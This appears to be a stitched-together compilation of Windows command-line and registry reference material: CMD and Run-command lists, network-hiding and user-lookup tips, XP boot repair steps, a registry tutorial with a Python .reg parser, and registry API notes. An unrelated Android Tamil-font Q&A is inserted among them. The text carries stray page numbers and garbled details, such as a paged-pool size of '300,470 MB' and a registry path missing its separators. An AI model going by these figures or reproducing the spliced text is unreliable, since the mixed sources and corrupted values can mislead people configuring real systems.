CLIP Copy STDIN to the Windows clipboard. CLS Clear the screen CLUSTER Windows Clustering CMD Start a new CMD shell CMDKEY Manage stored usernames/passwords COLOR Change colors of the CMD window COMP Compare the contents of two files or sets of files COMPACT Compress files or folders on an NTFS partition COMPRESS Compress individual files on an NTFS partition CON2PRT Connect or disconnect a Printer CONVERT Convert a FAT drive to NTFS. COPY Copy one or more files to another location CSCcmd Client-side caching (Offline Files) CSVDE Import or Export Active Directory data d DATE Display or set the date DEFRAG Defragment hard drive DEL Delete one or more files DELPROF Delete NT user profiles DELTREE Delete a folder and all subfolders DevCon Device Manager Command Line Utility DIR Display a list of files and folders DIRUSE Display disk usage DISKCOMP Compare the contents of two floppy disks DISKCOPY Copy the contents of one floppy disk to another DISKPART Disk Administration DNSSTAT DNS Statistics DOSKEY Edit command line, recall commands, and create macros DSACLs Active Directory ACLs DSAdd Add items to active directory (user group computer) DSGet View items in active directory (user group computer) DSQuery Search for items in active directory (user group computer)
23

DSMod Modify items in active directory (user group computer) DSMove Move an Active directory Object DSRM Remove items from Active Directory e ECHO Display message on screen ENDLOCAL End localisation of environment changes in a batch file ERASE Delete one or more files EVENTCREATE Add a message to the Windows event log EXIT Quit the current script/routine and set an errorlevel EXPAND Uncompress files EXTRACT Uncompress CAB files f FC Compare two files FIND Search for a text string in a file FINDSTR Search for strings in files FOR /F Loop command: against a set of files FOR /F Loop command: against the results of another command FOR Loop command: all options Files, Directory, List FORFILES Batch process multiple files FORMAT Format a disk FREEDISK Check free disk space (in bytes) FSUTIL File and Volume utilities FTP File Transfer Protocol FTYPE Display or modify file types used in file extension associations g GLOBAL Display membership of global groups GOTO Direct a batch program to jump to a labelled line GPUPDATE Update Group Policy settings h HELP Online Help i iCACLS Change file and folder permissions IF Conditionally perform a command

IFMEMBER Is the current user in an NT Workgroup IPCONFIG Configure IP k KILL Remove a program from memory l LABEL Edit a disk label LOCAL Display membership of local groups LOGEVENT Write text to the NT event viewer LOGMAN Manage Performance Monitor LOGOFF Log a user off LOGTIME Log the date and time in a file m MAPISEND Send email from the command line MBSAcli Baseline Security Analyzer. MEM Display memory usage MD Create new folders MKLINK Create a symbolic link (linkd) MODE Configure a system device MORE Display output, one screen at a time MOUNTVOL Manage a volume mount point MOVE Move files from one folder to another MOVEUSER Move a user from one domain to another MSG Send a message MSIEXEC Microsoft Windows Installer MSINFO32 System Information MSTSC Terminal Server Connection (Remote Desktop Protocol) MV Copy in-use files n NET Manage network resources NETDOM Domain Manager NETSH Configure Network Interfaces, Windows Firewall & Remote access NETSVC Command-line Service Controller NBTSTAT Display networking statistics (NetBIOS over TCP/IP) NETSTAT Display networking statistics (TCP/IP) NOW Display the current Date and Time NSLOOKUP Name server lookup NTBACKUP Backup folders to tape

NTRIGHTS Edit user account rights o OPENFILES Query or display open files p PATH Display or set a search path for executable files PATHPING Trace route plus network latency and packet loss PAUSE Suspend processing of a batch file and display a message PERMS Show permissions for a user PERFMON Performance Monitor PING Test a network connection POPD Restore the previous value of the current directory saved by PUSHD PORTQRY Display the status of ports and services POWERCFG Configure power settings PRINT Print a text file PRINTBRM Print queue Backup/Recovery PRNCNFG Display, configure or rename a printer PRNMNGR Add, delete, list printers set the default printer PROMPT Change the command prompt PsExec Execute process remotely PsFile Show files opened remotely PsGetSid Display the SID of a computer or a user PsInfo List information about a system PsKill Kill processes by name or process ID PsList List detailed information about processes PsLoggedOn Who's logged on (locally or via resource sharing) PsLogList Event log records PsPasswd Change account password PsService View and control services PsShutdown Shutdown or reboot a computer PsSuspend Suspend processes PUSHD Save and then change the current directory q QGREP Search file(s) for lines that match a given pattern.

r RASDIAL Manage RAS connections RASPHONE Manage RAS connections RECOVER Recover a damaged file from a defective disk. REG Registry: Read, Set, Export, Delete keys and values REGEDIT Import or export registry settings REGSVR32 Register or unregister a DLL REGINI Change Registry Permissions REM Record comments (remarks) in a batch file REN Rename a file or files REPLACE Replace or update one file with another RD Delete folder(s) RMTSHARE Share a folder or a printer ROBOCOPY Robust File and Folder Copy ROUTE Manipulate network routing tables RUN Start | RUN commands RUNAS Execute a program under a different user account RUNDLL32 Run a DLL command (add/remove print connections) s SC Service Control SCHTASKS Schedule a command to run at a specific time SCLIST Display NT Services SET Display, set, or remove environment variables SETLOCAL Control the visibility of environment variables SETX Set environment variables permanently SFC System File Checker SHARE List or edit a file share or print share SHIFT Shift the position of replaceable parameters in a batch file SHORTCUT Create a windows shortcut (.LNK file) SHOWGRPS List the NT Workgroups a user has joined SHOWMBRS List the Users who are members of a Workgroup

SHUTDOWN Shutdown the computer SLEEP Wait for x seconds SLMGR Software Licensing Management (Vista/2008) SOON Schedule a command to run in the near future SORT Sort input START Start a program or command in a separate window SU Switch User SUBINACL Edit file and folder Permissions, Ownership and Domain SUBST Associate a path with a drive letter SYSTEMINFO List system configuration t TASKLIST List running applications and services TASKKILL Remove a running process from memory TIME Display or set the system time TIMEOUT Delay processing of a batch file TITLE Set the window title for a CMD.EXE session TLIST Task list with full path TOUCH Change file timestamps TRACERT Trace route to a remote host TREE Graphical display of folder structure TSSHUTDN Remotely shut down or reboot a terminal server TYPE Display the contents of a text file TypePerf Write performance data to a log file u USRSTAT List domain usernames and last login v VER Display version information VERIFY Verify that files have been saved VOL Display a disk label w WAITFOR Wait for or send a signal WHERE Locate and display files in a directory tree WHOAMI Output the current UserName and domain WINDIFF Compare the contents of two files or sets of files

WINMSDP Windows system report WINRM Windows Remote Management WINRS Windows Remote Shell WMIC WMI Commands WUAUCLT Windows Update x XCACLS Change file and folder permissions XCOPY Copy files and folders :: Comment / Remark

Commands marked are Internal commands only available within the CMD shell. All other commands (not marked with ) are external commands which may be used under the CMD shell, PowerShell, or directly from START-RUN.

Finished

I performed the following steps but the modified key value reverts back to 0.
1. Go to Start --> Run, then type Regedit
2. Navigate to the registry folder HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
3. Find a key called CheckedValue.
4. Double Click CheckedValue key and modify it to 1. (This is to show all the hidden files.)
Please suggest further steps.

How To Hide Yourself From Network Users, And Give Access To Only Specific Users! Written by Madhukara H on June 2, 2007

How to Hide in the (Network) Neighborhood



Don't want your XP computer to show up in the network browse list (Network Neighborhood/My Network Places) to other users on your network? One way to accomplish that is to disable file sharing. To do this, click Start, right click My Network Places and select Properties. Right click your local area connection and click Properties. Uncheck the box that says File and Printer Sharing for Microsoft Networks. Click OK.

But what if you want to be able to share folders with some users; you just don't want everyone on the network to see your computer's shares? There's a way:

Click Start and select Run. In the Run box, type

net config server /hidden:yes

Click OK. Now others who know the UNC path (\\computer name\share name) can connect to your computer's shares from the Run box, but it won't show up in the network browse list. Hiding the computer this way only removes it from the browse list; it does not restrict access, so share and NTFS permissions still decide who can open the shares.

How to lookup a user name and machine name using an IP address (on Windows)

If you need to find a username but only have an IP address, and you use Active Directory (AD), then you can use the following method to find out the username. At the command prompt enter the following command:

nbtstat -A ipaddress

Where ipaddress is the IP address. This will list the machine name using that IP address. Then run the following command:

net view /domain:ad > somefile.txt

Where ad is the name of the domain you want to search and somefile.txt is the name of the file to contain the output. This will generate a list of every machine and who is logged in. Open the output file and search for the machine name determined in step 1 (the username will be listed next to this).

HTH

If you are using WebView, place your font file 'tamilfont.ttf' in the assets folder, and the Java code will be similar to this. Notice the font is applied in the CSS:

// HTML page whose CSS loads the font from the assets folder
String data = "<html><head><style>"
    + "@font-face {font-family: 'tamilfont'; src: url('file:///android_asset/tamilfont.ttf');} "
    + "h1 { font-family: 'tamilfont'; } "
    + "</style></head><body> <h1> !</h1> </body></html>";
WebView wv = (WebView) findViewById(R.id.webview);
// Render the HTML string in the WebView
wv.loadDataWithBaseURL(null, data, "text/html", "UTF-8", null);

This approach does not work in Android 2.0 and 2.1.

answered Apr 18 '11 at 10:23

Sam Quest

hi i am using json and stored as string - tamil Apr 19 '11 at 12:47

what is your output control to display? WebView / TextView ... - Sam Quest Apr 20 '11 at 5:14

@PM - Paresh Mayani: could you kindly point me where 'he' has mentioned webview. i presume that 'he' is 'me'. ;) - Sam Quest Jul 1 '11 at 4:44

Step 1: Download a tamil font .ttf file. (For example say kanchi.ttf).

Step 2: Now create a directory "fonts" in your assets folder in the android project.

Step 3: Now copy the kanchi.ttf file into assets/fonts folder in your Android project.

Step 4: Add these lines to your onCreate()

// Declare this as a field of the Activity class: modifiers such as
// "protected static" are not allowed on a local variable inside onCreate().
protected static Typeface tamil = null;

// Inside onCreate(): load the font from assets/fonts
tamil = Typeface.createFromAsset(getAssets(), "fonts/kanchi.ttf");

Step 5: Now provide this typeface to your TextView you want.

textview = (TextView) findViewById(R.id.tipstext);
textview.setTypeface(tamil);
textview.setTextSize(20);
textview.setText("nkZk;");

answered Jul 1 '11 at 7:21

Andro Selva

hi thanks for ur help. i have another one doubt here i want to display like " : English" how to set this string in textview - tamil Jul 7 '11 at 6:11

I am not sure. But it's better if you use two textview for this type. - Andro Selva Jul 7 '11 at 6:14

check this, there is something going on about tamil unicode for android as inbuild

http://xkrishx.wordpress.com/2011/07/30/tamil-unicode-font-forandroid/

Run Command Codes:
1. Accessibility Controls - access.cpl
2. Accessibility Wizard - accwiz
3. Add Hardware Wizard - hdwwiz.cpl
4. Add/Remove Programs - appwiz.cpl
5. Administrative Tools - control admintools
6. Automatic Updates - wuaucpl.cpl
7. Bluetooth Transfer Wizard - fsquirt
8. Calculator - calc
9. Certificate Manager - certmgr.msc
10. Character Map - charmap
11. Check Disk Utility - chkdsk
12. Clipboard Viewer - clipbrd
13. Command Prompt - cmd
14. Component Services - dcomcnfg
15. Computer Management - compmgmt.msc
16. Control Panel - control
17. Date and Time Properties - timedate.cpl
18. DDE Shares - ddeshare
19. Device Manager - devmgmt.msc
20. Direct X Troubleshooter - dxdiag
21. Disk Cleanup Utility - cleanmgr
22. Disk Defragment - dfrg.msc
23. Disk Management - diskmgmt.msc
24. Disk Partition Manager - diskpart
25. Display Properties - control desktop
26. Display Properties - desk.cpl
27. Dr. Watson System Troubleshooting Utility - drwtsn32
28. Driver Verifier Utility - verifier
29. Event Viewer - eventvwr.msc
30. Files and Settings Transfer Tool - migwiz
31. File Signature Verification Tool - sigverif
32. Findfast - findfast.cpl
33. Firefox - firefox
34. Folders Properties - control folders
35. Fonts - control fonts
36. Fonts Folder - fonts
37. Free Cell Card Game - freecell
38. Game Controllers - joy.cpl
39. Group Policy Editor (for xp professional) - gpedit.msc
40. Hearts Card Game - mshearts
41. Help and Support - helpctr
42. HyperTerminal - hypertrm
43. Iexpress Wizard - iexpress
44. Indexing Service - ciadv.msc
45. Internet Connection Wizard - icwconn1
46. Internet Explorer - iexplore
47. Internet Properties - inetcpl.cpl
48. Keyboard Properties - control keyboard
49. Local Security Settings - secpol.msc
50. Local Users and Groups - lusrmgr.msc
51. Logs You Out Of Windows - logoff
52. Malicious Software Removal Tool - mrt
53. Microsoft Chat - winchat
54. Microsoft Movie Maker - moviemk
55. Microsoft Paint - mspaint
56. Microsoft Synchronization Tool - mobsync
57. Minesweeper Game - winmine
58. Mouse Properties - control mouse
59. Mouse Properties - main.cpl
60. Netmeeting - conf
61. Network Connections - control netconnections
62. Network Connections - ncpa.cpl
63. Network Setup Wizard - netsetup.cpl
64. Notepad - notepad
65. Object Packager - packager
66. ODBC Data Source Administrator - odbccp32.cpl
67. On Screen Keyboard - osk
68. Outlook Express - msimn
69. Paint - pbrush
70. Password Properties - password.cpl
71. Performance Monitor - perfmon.msc
72. Performance Monitor - perfmon
73. Phone and Modem Options - telephon.cpl
74. Phone Dialer - dialer
75. Pinball Game - pinball
76. Power Configuration - powercfg.cpl
77. Printers and Faxes - control printers
78. Printers Folder - printers
79. Regional Settings - intl.cpl
80. Registry Editor - regedit
81. Registry Editor - regedt32
82. Remote Access Phonebook - rasphone
83. Remote Desktop - mstsc
84. Removable Storage - ntmsmgr.msc
85. Removable Storage Operator Requests - ntmsoprq.msc
86. Resultant Set of Policy (for xp professional) - rsop.msc
87. Scanners and Cameras - sticpl.cpl
88. Scheduled Tasks - control schedtasks
89. Security Center - wscui.cpl
90. Services - services.msc
91. Shared Folders - fsmgmt.msc
92. Shuts Down Windows - shutdown
93. Sounds and Audio - mmsys.cpl
94. Spider Solitaire Card Game - spider
95. SQL Client Configuration - cliconfg
96. System Configuration Editor - sysedit
97. System Configuration Utility - msconfig
98. System Information - msinfo32
99. System Properties - sysdm.cpl
100. Task Manager - taskmgr
101. TCP Tester - tcptest
102. Telnet Client - telnet
103. User Account Management - nusrmgr.cpl
104. Utility Manager - utilman
105. Windows Address Book - wab
106. Windows Address Book Import Utility - wabmig
107. Windows Explorer - explorer
108. Windows Firewall - firewall.cpl
109. Windows Magnifier - magnify
110. Windows Management Infrastructure - wmimgmt.msc
111. Windows Media Player - wmplayer
112. Windows Messenger - msmsgs
113. Windows System Security Tool - syskey
114. Windows Update Launches - wupdmgr
115. Windows Version - winver
116. Windows XP Tour Wizard - tourstart
117. Wordpad - write

Windows XP users

1. Insert the Windows XP bootable CD into the computer.
2. When prompted to press any key to boot from the CD, press any key.
3. Once in the Windows XP setup menu press the "R" key to repair Windows.
4. Log into your Windows installation by pressing the "1" key and pressing enter.
5. You will then be prompted for your administrator password, enter that password.
6. Copy the below two files to the root directory of the primary hard disk. In the below example we are copying these files from the CD-ROM drive letter, which in this case is "e." This letter may be different on your computer.

copy e:\i386\ntldr c:\
copy e:\i386\ntdetect.com c:\

7. Once both of these files have been successfully copied, remove the CD from the computer and reboot.

Windows Registry Tutorial

Overview

The Registry is a database used to store settings and options for the 32 bit versions of Microsoft Windows including Windows 95, 98, ME and NT/2000. It contains information and settings for all the hardware, software, users, and preferences of the PC. Whenever a user makes changes to Control Panel settings, File Associations, System Policies, or installed software, the changes are reflected and stored in the Registry.

The physical files that make up the registry are stored differently depending on your version of Windows. Under Windows 95 & 98 it is contained in two hidden files in your Windows directory, called USER.DAT and SYSTEM.DAT; for Windows Me there is an additional CLASSES.DAT file; under Windows NT/2000 the files are contained separately in the %SystemRoot%\System32\Config directory. You cannot edit these files directly; you must use a tool commonly known as a "Registry Editor" to make any changes (using registry editors will be discussed later in the article).

The Structure of the Registry

The Registry has a hierarchical structure. Although it looks complicated, the structure is similar to the directory structure on your hard disk, with Regedit being similar to Windows Explorer. Each main branch (denoted by a folder icon in the Registry Editor, see left) is called a Hive, and Hives contain Keys. Each key can contain other keys (sometimes referred to as sub-keys), as well as Values. The values contain the actual information stored in the Registry. There are three types of values: String, Binary, and DWORD. The use of these depends upon the context.

There are six main branches, each containing a specific portion of the information stored in the Registry. They are as follows:

HKEY_CLASSES_ROOT - This branch contains all of your file association mappings to support the drag-and-drop feature, OLE information, Windows shortcuts, and core aspects of the Windows user interface.

HKEY_CURRENT_USER - This branch links to the section of HKEY_USERS appropriate for the user currently logged onto the PC and contains information such as logon names, desktop settings, and Start menu settings.

HKEY_LOCAL_MACHINE - This branch contains computer specific information about the type of hardware, software, and other preferences on a given PC. This information is used for all users who log onto this computer.

HKEY_USERS - This branch contains individual preferences for each user of the computer. Each user is represented by a SID sub-key located under the main branch.

HKEY_CURRENT_CONFIG - This branch links to the section of HKEY_LOCAL_MACHINE appropriate for the current hardware configuration.

HKEY_DYN_DATA - This branch points to the part of HKEY_LOCAL_MACHINE, for use with the Plug-&-Play features of Windows. This section is dynamic and will change as devices are added and removed from the system.

Each registry value is stored as one of five main data types:

REG_BINARY - This type stores the value as raw binary data. Most hardware component information is stored as binary data, and can be displayed in an editor in hexadecimal format.

REG_DWORD - This type represents the data by a four byte number and is commonly used for boolean values, such as "0" is disabled and "1" is enabled. Additionally many parameters for device drivers and services are this type, and can be displayed in REGEDT32 in binary, hexadecimal and decimal format, or in REGEDIT in hexadecimal and decimal format.

REG_EXPAND_SZ - This type is an expandable data string, that is, a string containing a variable to be replaced when called by an application. For example, for the following value, the string "%SystemRoot%" will be replaced by the actual location of the directory containing the Windows NT system files. (This type is only available using an advanced registry editor such as REGEDT32)

REG_MULTI_SZ - This type is a multiple string used to represent values that contain lists or multiple values; each entry is separated by a NULL character. (This type is only available using an advanced registry editor such as REGEDT32)

REG_SZ - This type is a standard string, used to represent human readable text values.

Other data types not available through the standard registry editors include:

REG_DWORD_LITTLE_ENDIAN - A 32-bit number in little-endian format.
REG_DWORD_BIG_ENDIAN - A 32-bit number in big-endian format.
REG_LINK - A Unicode symbolic link. Used internally; applications should not use this type.
REG_NONE - No defined value type.
REG_QWORD - A 64-bit number.
REG_QWORD_LITTLE_ENDIAN - A 64-bit number in little-endian format.
REG_RESOURCE_LIST - A device-driver resource list.

Editing the Registry

The Registry Editor (REGEDIT.EXE) is included with most versions of Windows (although you won't find it on the Start Menu). It enables you to view, search and edit the data within the Registry. There are several methods for starting the Registry Editor; the simplest is to click on the Start button, then select Run, and in the Open box type "regedit". If the Registry Editor is installed it should now open and look like the image below.

An alternative Registry Editor (REGEDT32.EXE) is available for use with Windows NT/2000. It includes some additional features not found in the standard version, including the ability to view and modify security permissions, and the ability to create and modify the extended string values REG_EXPAND_SZ & REG_MULTI_SZ.

Create a Shortcut to Regedit

This can be done by simply right-clicking on a blank area of your desktop, selecting New, then Shortcut, then in the Command line box enter "regedit.exe" and click Next, enter a friendly name (e.g. 'Registry Editor') then click Finish and now you can double click on the new icon to launch the Registry Editor.

Using Regedit to modify your Registry

Once you have started Regedit you will notice that on the left side there is a tree with folders, and on the right the contents (values) of the currently selected folder.

Like Windows Explorer, to expand a certain branch (see the structure of the registry section), click on the plus sign [+] to the left of any folder, or just double-click on the folder. To display the contents of a key (folder), just click the desired key, and look at the values listed on the right side. You can add a new key or value by selecting New from the Edit menu, or by right-clicking your mouse. And you can rename any value and almost any key with the same method used to rename files: right-click on an object and click rename, or click on it twice (slowly), or just press F2 on the keyboard. Lastly, you can delete a key or value by clicking on it, and pressing Delete on the keyboard, or by right-clicking on it, and choosing Delete.

Note: it is always a good idea to back up your registry before making any changes to it. It can be intimidating to a new user, and there is always the possibility of changing or deleting a critical setting causing you to have to reinstall the whole operating system. It's much better to be safe than sorry!

Importing and Exporting Registry Settings

A great feature of the Registry Editor is its ability to import and export registry settings to a text file. This text file, identified by the .REG extension, can then be saved or shared with other people to easily modify local registry settings. You can see the layout of these text files by simply exporting a key to a file and opening it in Notepad. To do this using the Registry Editor select a key, then from the "Registry" menu choose "Export Registry File...", choose a filename and save. If you open this file in Notepad you will see a file similar to the example below:

REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\Setup]
"SetupType"=dword:00000000
"CmdLine"="setup -newsetup"
"SystemPrefix"=hex:c5,0b,00,00,00,40,36,02

The layout is quite simple: REGEDIT4 indicates the file type and version, [HKEY_LOCAL_MACHINE\SYSTEM\Setup] indicates the key the values are from, and "SetupType"=dword:00000000 are the values themselves. The portion after the "=" will vary depending on the type of value they are: DWORD, String or Binary.

So by simply editing this file to make the changes you want, it can then be easily distributed and all that needs to be done is to double-click, or choose "Import" from the Registry menu, for the settings to be added to the system Registry.

Deleting keys or values using a REG file

It is also possible to delete keys and values using REG files. To delete a key start by using the same format as the REG file above, but place a "-" symbol in front of the key name you want to delete. For example to delete the [HKEY_LOCAL_MACHINE\SYSTEM\Setup] key the reg file would look like this:

REGEDIT4

[-HKEY_LOCAL_MACHINE\SYSTEM\Setup]

The format used to delete individual values is similar, but instead of a minus sign in front of the whole key, place it after the equal sign of the value. For example, to delete the value "SetupType" the file would look like:

REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\Setup]
"SetupType"=-

Use this feature with care, as deleting the wrong key or value could cause major problems within the registry, so remember to always make a backup first.

Regedit Command Line Options

Regedit has a number of command line options to help automate its use in either batch files or from the command prompt. Listed below are some of the options; please note that some of the functions are operating system specific.


regedit.exe [options] [filename] [regpath]

[filename]   Import .reg file into the registry
/s [filename]   Silent import, i.e. hide confirmation box when importing files
/e [filename] [regpath]   Export the registry to [filename] starting at [regpath], e.g. regedit /e file.reg HKEY_USERS\.DEFAULT
/L:system   Specify the location of the system.dat to use
/R:user   Specify the location of the user.dat to use
/C [filename]   Compress (Windows 98)
/D [regpath]   Delete the specified key (Windows 98)

Maintaining the Registry

On Windows NT you can use either the "Last Known Good" option or RDISK to restore the registry to a stable working configuration.

How can I clean out old data from the Registry?

Although it's possible to manually go through the Registry and delete unwanted entries, Microsoft provides a tool to automate the process; the program is called RegClean. RegClean analyzes Windows Registry keys stored in a common location in the Windows Registry. It finds keys that contain erroneous values, it

removes them from the Windows Registry after having recorded those entries in the Undo.Reg file.
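The .REG layout described above (header line, [key] sections, dword:/hex:/string data, and the two "-" deletion forms) can be checked mechanically before a file is double-clicked or passed to regedit /s. The Python parser below is an added example, not code from the original tutorial; it also decodes the hex(2) and hex(7) forms regedit writes for REG_EXPAND_SZ and REG_MULTI_SZ, and the sample file, the ExampleVendor keys and the cp1252 decoding of REGEDIT4 text are assumptions made for illustration.

```python
import re

# Constructed sample in the REGEDIT4 layout shown above. The first section is the
# tutorial's own example; the ExampleVendor keys are hypothetical.
SAMPLE_REG = r'''REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\Setup]
"SetupType"=dword:00000000
"CmdLine"="setup -newsetup"
"SystemPrefix"=hex:c5,0b,00,00,00,40,36,02

[HKEY_LOCAL_MACHINE\SOFTWARE\ExampleVendor\App]
"InstallDir"=hex(2):25,53,79,73,74,65,6d,52,6f,6f,74,25,5c,41,70,70,00
"Paths"=hex(7):61,00,62,62,00,\
  00
"OldSetting"=-

[-HKEY_LOCAL_MACHINE\SOFTWARE\ExampleVendor\Legacy]
'''

# Header line -> encoding of string data stored as hex bytes.
HEADERS = {"REGEDIT4": "cp1252",  # assumption: ANSI export from a Western system
           "Windows Registry Editor Version 5.00": "utf-16-le"}
TYPES = {0: "REG_NONE", 1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY",
         4: "REG_DWORD", 7: "REG_MULTI_SZ", 11: "REG_QWORD"}
VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')
HEX_RE = re.compile(r'^hex(?:\(([0-9a-fA-F]+)\))?:(.*)$')


def _unquote(quoted):
    """Strip the surrounding quotes and undo backslash escapes."""
    return re.sub(r'\\(.)', r'\1', quoted[1:-1])


def _logical_lines(text):
    """Yield stripped lines, joining hex data wrapped with a trailing backslash."""
    buf = ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith(",\\"):
            buf += line[:-1]
            continue
        yield buf + line
        buf = ""


def _decode(data, encoding):
    """Turn the text after '=' into (type name, Python value)."""
    if data == "-":                      # "Name"=-  deletes the value
        return "DELETE", None
    if len(data) >= 2 and data[0] == data[-1] == '"':
        return "REG_SZ", _unquote(data)
    if data.startswith("dword:"):
        return "REG_DWORD", int(data[6:], 16)
    m = HEX_RE.match(data)
    if m is None:
        raise ValueError("unknown value data: %r" % data)
    kind = int(m.group(1), 16) if m.group(1) else 3   # plain hex: is REG_BINARY
    raw = bytes(int(b, 16) for b in m.group(2).split(",") if b.strip())
    name = TYPES.get(kind, "REG_TYPE_%d" % kind)
    if kind in (1, 2):
        return name, raw.decode(encoding).rstrip("\0")
    if kind == 7:                        # NUL-separated list of strings
        return name, [s for s in raw.decode(encoding).split("\0") if s]
    return name, raw


def parse_reg(text):
    """Return the operations a .reg file would perform, in file order."""
    lines = [ln for ln in _logical_lines(text.lstrip("\ufeff"))
             if ln and not ln.startswith(";")]
    if not lines or lines[0] not in HEADERS:
        raise ValueError("missing REGEDIT4 / Version 5.00 header")
    encoding, ops, key = HEADERS[lines[0]], [], None
    for line in lines[1:]:
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            if key.startswith("-"):      # [-KEY] removes the key and all below it
                ops.append({"action": "delete_key", "key": key[1:]})
                key = None
            continue
        m = VALUE_RE.match(line)
        if m is None or key is None:
            raise ValueError("unparseable line: %r" % line)
        name = "(Default)" if m.group(1) == "@" else _unquote(m.group(1))
        vtype, data = _decode(m.group(2), encoding)
        ops.append({"action": "delete_value" if vtype == "DELETE" else "set_value",
                    "key": key, "name": name, "type": vtype, "data": data})
    return ops


def destructive(ops):
    """Operations that delete data: the ones to review before importing."""
    return [op for op in ops if op["action"].startswith("delete")]


if __name__ == "__main__":
    for op in parse_reg(SAMPLE_REG):
        print(op)
```

Running `destructive(parse_reg(...))` on a file received from someone else lists every key and value it would remove, which the confirmation box shown on import does not.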

The expected skills:

Able to understand Windows Registry.

Able to understand and use functions to manipulate Windows Registry.

Able to gather and understand the required information in order to use those functions.

Introduction

The registry is a system-defined database in which applications and system components store and retrieve configuration data. The data stored in the registry varies according to the version of Microsoft Windows. Applications use the registry API to retrieve, modify, or delete registry data. You should not edit registry data that does not belong to your application unless it is absolutely necessary. If there is an error in the registry, your system may not function properly. If this happens, you can restore the registry to the state it was in when you last started the computer successfully.

Structure of the Registry

The registry stores data in a tree format. Each node in the tree is called a key. Each key can contain both subkeys and data entries called values. Sometimes, the presence of a key is all the data that an application requires; other times, an application opens a key and uses the values associated with the key. A key can have any number of values, and the values can be in any form. Each key has a name consisting of one or more printable characters. Key names cannot include a backslash (\), but any other printable or unprintable character can be used. The name of each subkey is unique with respect to the key that is immediately above it in the hierarchy. Key names are not localized into other languages, although values may be.

The following figure is an example registry key structure as displayed by the Registry Editor (regedit.exe).

Figure 1: Registry Editor.

Each of the trees under My Computer is a key. The HKEY_LOCAL_MACHINE key has the following subkeys: HARDWARE, SAM, SECURITY, SOFTWARE, and SYSTEM. Each value consists of a value name and its associated data, if any. MaxObjectNumber and VgaCompatible are values under the DEVICEMAP\VIDEO subkey that contain data.

Registry Storage Space

Although there are few technical limits to the type and size of data an application can store in the registry, certain practical guidelines exist to promote system efficiency. An application should store configuration and initialization data in the registry, and store other kinds of data elsewhere. Generally, data consisting of more than one or two kilobytes (KB) should be stored as a file and referred to by using a key in the registry rather than being stored as a value. Instead of duplicating large pieces of data in the registry, an application should save the data as a file and refer to the file. Executable binary code should never be stored in the registry.

A value entry uses much less registry space than a key. To save space, an application should group similar data together as a structure and store the structure as a value rather than storing each of the structure members as a separate key. Storing the data in binary form allows an application to store data in one value that would otherwise be made up of several incompatible types.

Windows Server 2003 and Windows XP: Views of the registry files are mapped in the computer cache address space. Therefore, regardless of the size of the registry data, it is not charged more than 4 megabytes (MB). There are no longer any explicit limits on the total amount of space that may be consumed by hives in paged pool memory, and in disk space. The size of the system hive is limited only by physical memory.

Windows 2000 and Windows NT: Registry data is stored in the paged pool, an area of physical memory used for system data that can be written to disk when not in use. The RegistrySizeLimit value establishes the maximum amount of paged pool that can be consumed by registry data from all applications. This value is located in the following registry key:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control

52

By default, the registry size limit is 25 percent of the paged pool. The default size of the paged pool is 32 MB, so this is 8 MB. The system ensures that the minimum value of RegistrySizeLimit is 4 MB and the maximum is approximately 80 percent of the PagedPoolSize value. If the value of this entry is greater than 80 percent of the size of the paged pool, the system sets the maximum size of the registry to 80 percent of the size of the paged pool. This prevents the registry from consuming space needed by processes. Note that setting this value does not allocate space in the paged pool, nor does it assure that the space will be available if needed. The paged pool size is determined by the PagedPoolSize value in the following registry key: HKEY_LOCAL_MACHINE System CurrentControlSet Control SessionManager MemoryManagement Windows 2000: The maximum paged pool is approximately 300,470 MB so the registry size limit is 240-376 MB. However, if the /3GB switch is used, the maximum paged pool size is 192 MB, so the registry can be a maximum of 153.6 MB. Windows NT 4.0: The maximum paged pool size is 192 MB, so the registry size limit is 153.6 MB. Windows NT 3.51 and earlier: The maximum paged pool is 128 MB, so the registry size limit is 102 MB. Predefined Keys

An application must open a key before it can add data to the registry. To open a key, an application must supply a handle to another key in the registry that is already open. The system defines predefined keys that are always open. Predefined keys help an application navigate in the registry and make it possible to develop tools that allow a system administrator to manipulate categories of data. Applications that add data to the registry should always work within the framework of predefined keys, so administrative tools can find and use the new data. An application can use handles to these keys as entry points to the registry. These handles are valid for all implementations of the registry, although the use of the handles may vary from platform to platform. In addition, other predefined handles have been defined for specific platforms. The following are handles to the predefined keys.

Handle: HKEY_CLASSES_ROOT
Description: Registry entries subordinate to this key define types (or classes) of documents and the properties associated with those types. Shell and COM applications use the information stored under this key. This key also provides backward compatibility with the Windows 3.1 registration database by storing information for DDE and OLE support. File viewers and user interface extensions store their OLE class identifiers in HKEY_CLASSES_ROOT, and in-process servers are registered in this key. This handle should not be used in a service or an application that impersonates different users.

Handle: HKEY_CURRENT_CONFIG
Description: Contains information about the current hardware profile of the local computer system. The information under HKEY_CURRENT_CONFIG describes only the differences between the current hardware configuration and the standard configuration. Information about the standard hardware configuration is stored under the Software and System keys of HKEY_LOCAL_MACHINE. HKEY_CURRENT_CONFIG is an alias for HKEY_LOCAL_MACHINE\System\CurrentControlSet\Hardware Profiles\Current. Windows NT 3.51 and earlier: This key does not exist.

Handle: HKEY_CURRENT_USER
Description: Registry entries subordinate to this key define the preferences of the current user. These preferences include the settings of environment variables, data about program groups, colors, printers, network connections, and application preferences. This key makes it easier to establish the current user's settings; the key maps to the current user's branch in HKEY_USERS. In HKEY_CURRENT_USER, software vendors store the current user-specific preferences to be used within their applications. Microsoft, for example, creates the HKEY_CURRENT_USER\Software\Microsoft key for its applications to use, with each application creating its own subkey under the Microsoft key. This handle should not be used in a service or an application that impersonates different users. Instead, call the RegOpenCurrentUser() function.

Handle: HKEY_DYN_DATA
Description: Windows Me/98/95: Registry entries subordinate to this key allow you to collect performance data.

Handle: HKEY_LOCAL_MACHINE
